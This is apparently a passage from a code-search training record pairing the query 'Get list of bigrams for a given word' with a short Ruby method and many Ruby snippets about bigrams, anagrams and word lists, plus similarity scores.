"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def initialize()\n @memory = 0\n @variables = Array.new\n @nombres = Array.new\n @salidaF = \"\"\n end",
"def set_analysis\r\n @analysis = Analysis.find(params[:id])\r\n end",
"def initialize\n end",
"def initialize\n end"
] | [
"0.60718626",
"0.56724",
"0.5556387",
"0.55020416",
"0.5490031",
"0.5408278",
"0.53601986",
"0.5353507",
"0.5347011",
"0.52998775",
"0.52591366",
"0.5214828",
"0.5195328",
"0.5185657",
"0.51741457",
"0.51688296",
"0.51621974",
"0.51539665",
"0.51346606",
"0.5134577",
"0.5127136",
"0.50998497",
"0.509942",
"0.5095463",
"0.50804067",
"0.5076985",
"0.506083",
"0.5055892",
"0.50522375",
"0.5051439",
"0.504591",
"0.50380653",
"0.50380653",
"0.5034696",
"0.5027512",
"0.5022789",
"0.50153685",
"0.50037086",
"0.49944273",
"0.49834886",
"0.49807888",
"0.49786812",
"0.49688765",
"0.49649578",
"0.49643698",
"0.49614847",
"0.49587214",
"0.4956348",
"0.49556616",
"0.49542415",
"0.49534392",
"0.4951538",
"0.49509308",
"0.49475443",
"0.49455047",
"0.49438837",
"0.4919406",
"0.49150953",
"0.49135292",
"0.49120507",
"0.49074164",
"0.49054086",
"0.4902375",
"0.49007583",
"0.4898645",
"0.48980007",
"0.48943955",
"0.489357",
"0.489357",
"0.489357",
"0.489357",
"0.48829845",
"0.48775634",
"0.48731762",
"0.48722535",
"0.4871076",
"0.48550758",
"0.48511115",
"0.485013",
"0.485013",
"0.485013",
"0.48466346",
"0.48373127",
"0.48334852",
"0.48319805",
"0.48276538",
"0.48238415",
"0.48203272",
"0.48172122",
"0.48149422",
"0.48149422",
"0.48138538",
"0.48109257",
"0.48090565",
"0.48070565",
"0.4803068",
"0.48019272",
"0.48000968",
"0.47973192",
"0.47938436",
"0.47938436"
] | 0.0 | -1 |
Get list of bigrams for a given word. | def [](word)
@index[word]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def get_bigrams_internal(word, *args)\n http_method = :get\n path = '/word/{word}/phrasesInternal'\n path.sub!('{word}', word.to_s)\n\n # Ruby turns all key-value arguments at the end into a single hash\n # e.g. Wordnik.word.get_examples('dingo', :limit => 10, :part_of_speech => 'verb')\n # becomes {:limit => 10, :part_of_speech => 'verb'}\n last_arg = args.pop if args.last.is_a?(Hash)\n last_arg = args.pop if args.last.is_a?(Array)\n last_arg ||= {}\n\n # Look for a kwarg called :request_only, whose presence indicates\n # that we want the request itself back, not the response body\n if last_arg.is_a?(Hash) && last_arg[:request_only].present?\n request_only = true\n last_arg.delete(:request_only)\n end\n\n params = last_arg\n body ||= {}\n request = Wordnik::Request.new(http_method, path, :params => params, :body => body)\n request_only ? request : request.response.body\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def anagrams(word, words)\n # TODO: check if \"words\" has anagrams of \"word\" and return them in an array\nend",
"def anagrams\n word.anagram.words.pluck(:text) - [word.text]\n end",
"def anagrams(word)\n EpicAnagram.find_anagrams(word)\n end",
"def get_anagrams(word)\n # FILL ME IN\n unless valid_word?(word)\n return \"Invalid input (string should only consist of letters).\"\n end\n counter = get_counts(word.downcase)\n if @anagrams.has_key?(counter) && @anagrams[counter].size() > 0\n return @anagrams[counter].to_a - [word.downcase]\n else\n return \"No anagrams found!\"\n end\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def find_anagrams( words )\r\n\tif words.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tresult = []\r\n\t\tsource = words[0]\r\n\t\twords.each do |w|\r\n\t\t\tif are_anagrams?( source, w )\r\n\t\t\t\tresult << w\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\t\r\n\treturn result\r\nend",
"def word_combos(word)\n\t\tword = word.chars.to_a\n\t\tall_word_combo = []\n\t\ti = 1\n\t\twhile i <= word.size\n\t\t\tall_word_combo << word.permutation(i).to_a\n\t\t\ti+=1\n\t\tend\n\t\treturn all_word_combo\n\tend",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def anagrams(word, words)\n sorted_test_word = word.chars.sort.join\n sorted_words = words.map do |word|\n word.chars.sort.join\n end\n\n anagram_locations = sorted_words.map.with_index do |word, index|\n if word == sorted_test_word\n index\n end\n end.compact\n # sorted_words.keep_if.with_index {|word, index| word == sorted_test_word}\n anagrams = []\n anagram_locations.each do |location|\n anagrams << words[location]\n end\n anagrams\nend",
"def next_words_for(word) \n if word.nil? or word.empty?\n generator_names \n else\n name_of_last_generator_inverse = word[-1].swapcase\n generator_names.find_all{|name| name != name_of_last_generator_inverse }.map{|name| word + name }\n end\n end",
"def get_runs(word)\n word.squeeze.chars.sort.join\n end",
"def match(possible_anagrams)\nresult = []\nsplitted_word = @word.downcase.split(\"\").sort\n\npossible_anagrams.each do |element|\nif splitted_word == element.downcase.split(\"\").sort\n result << element\nend \nend\nresult\nend",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def get_matches(word)\n cur = self\n word.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n return Set.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here\n end",
"def group_anagrams(words)\n anagrams = {}\n words.each { |word|\n sorted_word = word.split(\"\").sort().join(\"\")\n if anagrams.has_key?(sorted_word)\n anagrams[sorted_word] << word\n else\n anagrams[sorted_word] = [word]\n end\n }\n return anagrams.values()\nend",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def combine_anagrams(words)\r\n\tanagrams = find_anagrams( words )\r\n\tif anagrams.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tnewWords = words - anagrams\r\n\t\tresult = [anagrams] + combine_anagrams(newWords)\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def query(word)\n node = @the_node\n results = []\n word.split(\"\").each do |letter|\n next_node = node[letter]\n if next_node != nil\n node = next_node\n next\n else\n return ['']\n end\n end\n results << Word.new(word, node.final)\n results += get_childs(node).map{|s| Word.new(word) + s}\n results.select{|r| r.final}.map{|r| r.to_s }\n end",
"def group_anagrams(words)\n if words.length == 0\n return []\n end\n\n sorted_words = words.map { |word|\n word.split(\"\").sort().join(\"\")\n }\n indices = (Array.new(words.length) { |i| i }).sort { |a, b| sorted_words[a] <=> sorted_words[b] }\n\n result = []\n current_anagram_group = []\n current_anagram = sorted_words[indices[0]]\n\n indices.each { |index|\n word = words[index]\n sorted_word = sorted_words[index]\n\n if sorted_word == current_anagram\n current_anagram_group << word\n next\n end\n\n result << current_anagram_group\n current_anagram_group = [word]\n current_anagram = sorted_word\n }\n result << current_anagram_group\nend",
"def anagrams(word)\n\n dictionary = File.open(\"enable.txt\").read.split(\"\\n\")\n\n dictionary_array = word.chars.to_a\n matches = dictionary_array.permutation(word.length).to_a\n\n my_anagrams = []\n matches.each do |i|\n matches = i.join\n if dictionary.include?(matches)\n \tmy_anagrams.push(matches) \n end\n end\n my_anagrams.delete(word)\n\n return my_anagrams.sort_by(&:downcase)\nend",
"def get_anagrams(word, dict)\n return nil if dict.empty?\n word_freq = char_freq(word)\n dict.select {|entry| anagrams?(word_freq, char_freq(entry))}.sort\nend",
"def grams\n gram_equivalent / amount\n end",
"def ngrams(str)\n if ngrammer\n return ngrammer.call(str)\n end\n\n # two letter ngrams (bigrams)\n ngrams = str.each_char.each_cons(2).map(&:join)\n # runs of digits\n ngrams += str.scan(/\\d+/)\n ngrams.uniq\n end",
"def find_anagrams(target_word, array_of_words)\n array_of_anagrams = []\n\n array_of_words.each do |member|\n if member.split(//).sort == target_word.split(//).sort\n array_of_anagrams.push(member)\n else\n next\n end\n end\n array_of_anagrams\nend",
"def find_anagrams(base_word, word_list)\n word_list.select do |word|\n anagram?(base_word, word)\n end\nend",
"def get_word_results(word, label=nil)\n return [word]\n end",
"def match(array) #takes in an array of possible anagrams\n anagrams = []\n \n # iterate over array of words\n array.each do |word|\n # compare each word of array to OG word \n # determine if word is anagram\n if word.chars.sort == @word.chars.sort\n anagrams << word\n end\n end\n anagrams #return all matches/ empty array if no matches exist\n end",
"def ngram_list(str, ngram_size=@ngram_size)\n str = alphabet_only(str).split(\"\")\n ngram_list = []\n (0..str.size - ngram_size).each do |i|\n ngram = \"\"\n (0...ngram_size).each { |j| ngram << str[i + j] }\n ngram_list << ngram\n end\n ngram_list\n end",
"def anagrams(word, words)\n p words.select {|x| x.chars.sort == word.chars.sort }\nend",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def match(possible_anagrams)\n anagrams = []\n possible_anagrams.each do |possible_anagram|\n if possible_anagram.split(\"\").sort == @word.split(\"\").sort\n anagrams << possible_anagram\n end\n end\n anagrams\nend",
"def find_anagrams( target_word, list_of_words )\n anagrams = []\n list_of_words.each{ |element|\n if anagram_canonical_form(element) == anagram_canonical_form(target_word)\n anagrams << element\n end\n }\n return anagrams\nend",
"def combine_anagrams(words)\n groups = []\n words.each { |word|\n inserted = false\n groups.each { |item|\n if word.isAnagram(item[0])\n item << word\n inserted = true\n end\n }\n if ! inserted\n list = []\n list << word\n groups << list\n end\n }\n return groups\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def words\n @phrase.split(/[^A-Za-z0-9']+/)\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def anagrams(word)\n dictionary = File.readlines(Dir.pwd << \"/enable.txt\").map { |word| word.chomp }\n anagrams = []\n\n word = word.split(\"\")\n word.permutation.to_a.each do |possible_perm|\n anagrams << possible_perm.join.upcase if dictionary.include?(possible_perm.join)\n end\n anagrams\nend",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def word_unscrambler(word, dic)\n word = word.split(\"\").sort!\n anagrams = []\n\n i = 0\n while i < dic.length\n compare = dic[i].split(\"\").sort\n if word == compare\n anagrams << dic[i]\n end\n i += 1\n end\n p anagrams\nend",
"def words\n @words_array = @phrase.split(' ')\n end",
"def words\n @words ||= begin\n words = Set.new\n board_traverser.each_with_recur do |word, char, recurser|\n next unless searcher.has_child? char\n searcher.down_to char do\n words << word if searcher.on_word? && !@guessed.include?(word)\n recurser.call\n end\n end\n words.sort_by &:length\n end\n end",
"def combine_anagrams(words)\n\tresult = []\n\twords.each do |word|\n\t\ttemp_word = sort_letters(word)\n\t\tis_found = false\n\t\tresult.each do |grouped_array|\n\t\t\tif !false and sort_letters(grouped_array.last) == temp_word\n\t\t\t\tgrouped_array << word\n\t\t\t\tis_found = true\n\t\t\tend\n\t\tend\n\t\tresult << [word] if !is_found\n\tend\n\tresult\nend",
"def splits(text)\n (0..[max_word_length, text.size-1].min).\n map { |i| [text[0..i], text[i+1..text.size]] }\n end",
"def each \n if @array_words.length < 3\n return \"Length of the input_file is too small to produce trigrams\"\n end\n \n sentence = generate_sentence\n 0.upto(sentence.split.length - 1) do |x|\n yield sentence.split[x]\n end\n return sentence\n end",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def best_match(given_word)\n words = (@word_list.is_a? Array) ? @word_list : @word_list.keys\n\n word_bigrams = bigramate(given_word)\n word_hash = words.map do |key|\n [key, bigram_compare(word_bigrams, bigramate(key))]\n end\n word_hash = Hash[word_hash]\n\n # Weight by word usage, if logical\n word_hash = apply_usage_weights(word_hash) if @word_list.is_a? Hash\n\n word_hash.max_by { |_key, value| value }.first\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def combine_anagrams(list_of_words)\n result = []\n list_of_words.each { | word |\n found = false \n for added_words in result\n if word.anagrams?(added_words[0])\n added_words << word\n puts \"==>#{added_words}\"\n found = true\n break \n end \n end\n #Add the new anagram group list\n if !found then result << [word] end\n }\n return result\nend",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def words_for(uid)\n word_list = get_words(uid)\n\n return word_list if ngrams <= 1\n word_list.each_cons(ngrams).map { |a| a.join(' ') }\n end",
"def anagrams_for(word, array)\n array.find_all {|element| are_anagrams?(word, element)}\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def mcw(word)\n\t\tif $bigrams[word] != nil\n\t\t\tmcw_num = 0\n\t\t\tmcw_key = nil\n\t\t\t# For each key in the biagram count the number of times a word after it occurs\n\t\t\t$bigrams[word].keys.each do |key|\n\t\t\t\tif $bigrams[word][key] > mcw_num\n\t\t\t\t\tmcw_num = $bigrams[word][key]\n\t\t\t\t\tmcw_key = key\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn mcw_key\n\t\tend\n\t\treturn nil\nend",
"def get_tokens\n tokens = []\n start = 0\n # Presumption: if the word is not at least 4 letters long, it contains no 4-letter sequences.\n (@wordstring.length - 3).times do\n tokens << @wordstring[start,4]\n start = start + 1\n end\n return tokens\n end",
"def get_word_value_array(word)\n html = RestClient.get(\"http://www.thesaurus.com/browse/#{word}\")\n word_string = Nokogiri::HTML(html).css(\"div.relevancy-list ul li a\").to_a\n part_of_speech = Nokogiri::HTML(html).css(\"div.mask ul li a em\")[0].text\n word_definition = Nokogiri::HTML(html).css(\"div.mask ul li a strong\")[0].text\n [word_string, \"(#{part_of_speech}) #{word_definition}\"]\n end",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def wordArray(guessword)\n word_array = []\n\n guessword.length.times do |letter|\n word_array << guessword[letter]\n end\n return word_array\nend",
"def mcw(word)\n\tindex = 0\n\n\tif $bigrams[word].nil? #if key doesn't exist, then there are no words that follow the given word\n\t\treturn -1\n\telse\n\t\tmax_val = $bigrams[word].max_by{|k,v| v}[1] #get max value\n\t\ttop_keys = $bigrams[word].select{|k, v| v == max_val}.keys #get keys that contain max value\n\tend\n\n\tif !top_keys.empty? #if more than one key is the max, randomly pick one\n\t\tindex = rand(0...top_keys.size)\n\tend\n\treturn top_keys[index]\nend",
"def gyms\n memberships.map do |mem|\n mem.gyms\n end\nend",
"def get_letters(word)\n word.encode('UTF-8').downcase.split(\"\")\n end",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def words\n self.scan(WORD_PATTERN)\n end",
"def find_anagrams(word, dictionary)\n sort_chars = lambda{ |x| x.chars.sort.join }\n anagrams = Hash.new{|h,k| h[k] = [] }\n dictionary.each do |w|\n anagrams[sort_chars.call(w)] << w\n end\n return anagrams[sort_chars.call(word)]\nend",
"def combine_anagrams(words)\r\n\tanagrams = words.group_by { |word| word.chars.sort }.values\t\r\nend",
"def map_words(input)\n results = []\n input.split.each do |word|\n results << yield(word)\n end\n results\nend",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def combine_anagrams(words)\n anagram_group = Hash.new([])\n words.each {|word| anagram_group[word.downcase.split(//).sort.join] += [word]}\n return anagram_group.values\nend",
"def combine_anagrams(words)\r\n buckets = Hash.new([])\r\n words.each do | item |\r\n key = item.downcase.chars.sort.join\r\n\r\n if buckets.has_key?(key)\r\n buckets[key] << item\r\n else\r\n buckets[key] = [item]\r\n end\r\n end\r\n\r\n output = Array.new;\r\n buckets.each do | key, value |\r\n output << value\r\n end\r\n return output\r\nend",
"def stem(word)\n stems = []\n\n FFI::MemoryPointer.new(:pointer) do |output|\n count = Hunspell.Hunspell_stem(self,output,word.to_s)\n ptr = output.get_pointer(0)\n\n if count > 0\n stems = ptr.get_array_of_string(0,count)\n end\n end\n\n return stems.map { |word| force_encoding(word) }\n end",
"def get_my_words\n # Words associated with online harassment\n trigger_words = [\"rape\",\"murder\",\"nigger\",\"slut\",\"whore\",\"bitch\",\"cunt\",\"kill\",\"die\",\"testword\"]\n my_words = Word.where(user_id: self.id)\n my_words.each do |word|\n trigger_words << word.word\n end\n return trigger_words\n end",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def words\n sentences.map { |sentence| sentence.words.map { |word| word } } .flatten.each\n end",
"def given_word(word)\n @guessword = word.to_s.split('')\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def get_words(text) #no!, two methods named get_words, see word_search.rb\n \twords = text.split('')\n \twords.each do |word|\n \t\t#how to check if word is correct or not?\n \t\tWord.new(name: word, ngsl: false, list: self.id )\n \t\t# example = Wordnik.word.get_top_example(word)['text']\n \tend\n end",
"def combine_anagrams(words)\n\tanagrams_hash = {}\n\twords.map { |w| w.downcase.split(//).sort.join }.each_with_index do |w, i|\n\t\tif anagrams_hash[w].is_a?(Array)\n\t\t\tanagrams_hash[w].push i\n\t\telse\n\t\t\tanagrams_hash[w] = [i]\n\t\tend\n\tend\n\n\treturn anagrams_hash.map { |word, indexes| indexes.map { |index| words[index] } }\nend",
"def words\n @words ||= @string.split(/\\b/).select { |w| w.match /\\w/ }\n end",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def combine_anagrams(words)\n anagrams = Hash.new()\n words.each do |word|\n letters = word.downcase.gsub(/[^a-z]/, \"\").split(\"\").sort.join\n anagrams[letters] = Array.new unless anagrams.include?(letters)\n anagrams[letters] << word\n end\n anagrams.values\nend",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def get_word\n @word_to_guess.join\n end",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def grouped_anagrams(strings)\n return [] if strings.empty?\n\n anagram_hash = Hash.new()\n strings.each do |string|\n word_array = string.split(\"\").sort\n if anagram_hash.include?(word_array)\n anagram_hash[word_array] << string\n else\n anagram_hash[word_array] = [string]\n end\n end\n\n result = []\n anagram_hash.each do |key, value|\n result << value\n end\n return result\n\nend",
"def guess_letters\n guess_array = []\n @current_word.each do\n guess_array << \"_\"\n end\n return guess_array\n end"
] | [
"0.72831625",
"0.6997435",
"0.65989906",
"0.6584841",
"0.6568877",
"0.64586675",
"0.63899153",
"0.6331027",
"0.60479885",
"0.584426",
"0.5836713",
"0.58013535",
"0.5772785",
"0.5749296",
"0.5738618",
"0.5575636",
"0.5538728",
"0.5534428",
"0.5527767",
"0.5497996",
"0.5491881",
"0.5456162",
"0.5445743",
"0.54423773",
"0.54392874",
"0.54209054",
"0.5416043",
"0.5400298",
"0.5398422",
"0.53628737",
"0.53485173",
"0.5335734",
"0.5298127",
"0.5287657",
"0.5261903",
"0.5260599",
"0.5238331",
"0.523173",
"0.52262527",
"0.5225119",
"0.5223236",
"0.5222321",
"0.5219524",
"0.52061445",
"0.51988745",
"0.518216",
"0.51708513",
"0.5170725",
"0.5167968",
"0.5153966",
"0.5153651",
"0.5148145",
"0.51399416",
"0.5116051",
"0.5108944",
"0.5100125",
"0.5097525",
"0.5094802",
"0.5094138",
"0.5093021",
"0.50892884",
"0.508519",
"0.5074888",
"0.50636744",
"0.5058012",
"0.5055209",
"0.5050799",
